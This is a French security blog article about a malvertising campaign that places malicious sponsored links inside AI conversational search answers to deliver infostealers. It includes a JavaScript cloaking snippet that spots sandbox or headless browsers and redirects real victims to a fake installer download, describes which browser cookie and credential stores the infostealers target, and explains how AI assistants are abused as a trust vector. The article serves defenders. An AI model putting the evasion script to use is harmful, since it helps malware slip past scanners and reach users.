Nouvelle campagne de malvertising dans les publicités IA
Découvrez comment une nouvelle campagne de malvertising infiltre les publicités de recherche IA pour distribuer des malwares. Sécurisez vos cookies.

L'évolution des cybermenaces progresse au même rythme que l'adoption des nouvelles technologies. Ces dernières semaines, des experts en cybersécurité ont détecté une campagne sophistiquée de malvertising exploitant les publicités de recherche IA. Cette attaque cible les annonces sponsorisées au sein des moteurs de recherche conversationnels (tels que Bing Chat, Gemini et d'autres assistants de recherche de nouvelle génération) pour distribuer des logiciels malveillants de type infostealer à des utilisateurs peu méfiants.
Cette campagne marque un tournant dans le domaine de l'ingénierie sociale : les utilisateurs accordent généralement une confiance bien plus grande aux réponses textuelles structurées par une intelligence artificielle qu'aux résultats de recherche classiques indexés par des algorithmes standards. Nous analysons ici le fonctionnement technique de cette campagne, son impact sur la sécurité et les mesures indispensables pour s'en protéger.
Comment fonctionne cette nouvelle campagne de malvertising ?
Le malvertising n'est pas un concept nouveau en soi. En revanche, son intégration au cœur des réponses générées par l'IA tire profit des systèmes d'enchères publicitaires en temps réel (RTB). Lorsqu'un internaute demande à un assistant conversationnel une recommandation de logiciel (par exemple, « télécharger un client SSH sécurisé » ou « meilleur éditeur PDF »), l'IA génère un texte explicatif et y insère nativement des liens de partenaires sponsorisés.
La chaîne d'infection est méticuleusement planifiée pour contourner les filtres de sécurité initiaux des régies publicitaires :
- Création d'annonces frauduleuses : Les attaquants remportent des enchères publicitaires sur des mots-clés populaires en piratant des comptes publicitaires légitimes.
- Diffusion de l'annonce contextualisée : L'assistant IA intègre le lien sponsorisé directement dans la conversation, donnant l'impression qu'il s'agit d'une suggestion directe et vérifiée de l'IA.
- Redirection conditionnelle : Si la requête provient d'un robot d'indexation ou d'un environnement d'analyse (sandbox), le serveur affiche un site bénin. S'il s'agit d'un utilisateur réel, il est redirigé vers un clone parfait du site officiel du logiciel.
- Téléchargement silencieux : La victime télécharge un installateur piégé qui exécute du code malveillant en arrière-plan à la suite d'un téléchargement furtif ou drive-by download.
Anatomie de la redirection et contournement des Sandbox
Afin de duper les mécanismes de détection automatique, les cybercriminels déploient des scripts d'évasion avancés. Le code JavaScript ci-dessous illustre comment le serveur malveillant fait la distinction entre un outil d'analyse automatisé et une victime potentielle grâce aux propriétés du navigateur :
// Détection du côté client pour filtrer les environnements d'analyse
function estUnEnvironnementDeTest() {
const detecteurs = [
/headless/i.test(navigator.userAgent),
navigator.webdriver,
window.outerWidth === 0 && window.outerHeight === 0,
navigator.languages.length === 0
];
return detecteurs.some(condition => condition === true);
}
function gererRedirection() {
if (estUnEnvironnementDeTest()) {
// Rediriger vers un site inoffensif pour tromper les scanners
window.location.href = "https://fr.wikipedia.org";
} else {
// Rediriger la victime vers la page de téléchargement falsifiée
window.location.href = "https://telechargement-securise-mise-a-jour.net/download/installer.exe";
}
}
Ce type de script permet de valider la publicité auprès des scanners automatiques, maintenant la campagne active pendant plusieurs jours avant qu'un signalement humain ne la bloque.
Modèles de recherche traditionnels vs Moteurs conversationnels IA
Les habitudes de recherche changent, et les vecteurs d'attaque s'adaptent. La table suivante synthétise les différences d'exposition au risque de fraude publicitaire :
| Critère | Moteurs de recherche classiques (SERP) | Moteurs de recherche conversationnels IA |
|---|---|---|
| Format publicitaire | Blocs d'annonces clairement identifiés avec la mention « Sponsorisé ». | Liens intégrés de manière fluide dans les phrases générées. |
| Niveau de confiance | Moyen-Faible (les utilisateurs ignorent souvent les premiers liens). | Très élevé (l'utilisateur suppose que l'IA a validé la source). |
| Mécanisme de redirection | Redirection généralement directe vers le domaine configuré. | Routage dynamique basé sur les cookies de session et l'empreinte navigateur. |
| Payload (logiciel malveillant) | Adwares classiques ou faux utilitaires système. | Voleurs de données (infostealers) de dernière génération (Lumma, Redline). |
Le vol de cookies de session : La cible principale
L'objectif ultime de cette campagne est d'obtenir un accès permanent aux sessions de la victime. Pour y parvenir, les attaquants utilisent des logiciels espions conçus pour sonder les bases de données SQLite des navigateurs Chromium afin de collecter :
- Cookies de session actifs : Permettant de contourner l'authentification multifacteur (MFA).
- Identifiants stockés : Mots de passe enregistrés en clair dans le gestionnaire du navigateur.
- Données de portefeuilles cryptographiques : Clés privées et cookies d'extensions.
Le détournement de session est particulièrement dévastateur dans les infrastructures d'entreprise. Pour auditer la sécurité de vos cookies et vous assurer qu'ils sont configurés avec des protections adaptées contre les accès non autorisés, vous pouvez utiliser notre outil interne Analyseur de cookies. Pour approfondir le rôle des drapeaux de sécurité, consultez notre article sur l'analyse de sécurité des cookies et drapeaux HttpOnly.
Mesures de prévention en entreprise
Afin de contrer efficacement les attaques de malvertising dans vos environnements réseau, appliquez les consignes suivantes :
- Restriction d'exécution logicielle (AppLocker) : Bloquez le lancement de fichiers binaires non signés depuis des répertoires temporaires (
AppData\Local\Temp). - Filtrage DNS protecteur : Utilisez des résolveurs DNS sécurisés bloquant automatiquement les noms de domaine enregistrés récemment (moins de 30 jours).
- Déploiement de bloqueurs d'annonces globaux : L'usage de bloqueurs de publicité au niveau de la passerelle réseau empêche l'apparition de liens sponsorisés frauduleux dans les fenêtres de discussion IA.
- Sensibilisation à l'ingénierie sociale moderne : Formez vos collaborateurs pour qu'ils ne considèrent pas les recommandations d'une IA comme infaillibles. Lisez notre guide complet sur la manière de détecter et éviter le malvertising en ligne.
Conclusion
Le détournement de publicités de recherche IA pour le malvertising illustre la capacité des cybercriminels à détourner les nouvelles technologies à leur avantage. Accorder une confiance aveugle aux suggestions des modèles conversationnels est aujourd'hui une vulnérabilité critique.
Ne téléchargez jamais d'utilitaires suggérés par une IA sans avoir préalablement vérifié l'adresse URL du site officiel du constructeur dans la barre d'adresse. Une veille technologique et des audits réguliers sur les postes de travail sont indispensables pour neutraliser ces intrusions.
Sources et lectures recommandées :
- W3C Web Security Standards — Normes officielles de sécurité des architectures web et des navigateurs.
- Wikipedia: Malvertising — Définition globale du concept de publicité malveillante.
- Blog TecnoCrypter : Se prémunir contre les attaques de téléchargement furtif (Drive-by Download).
- Blog TecnoCrypter : Analyse technique sur la sécurité des cookies modernes.


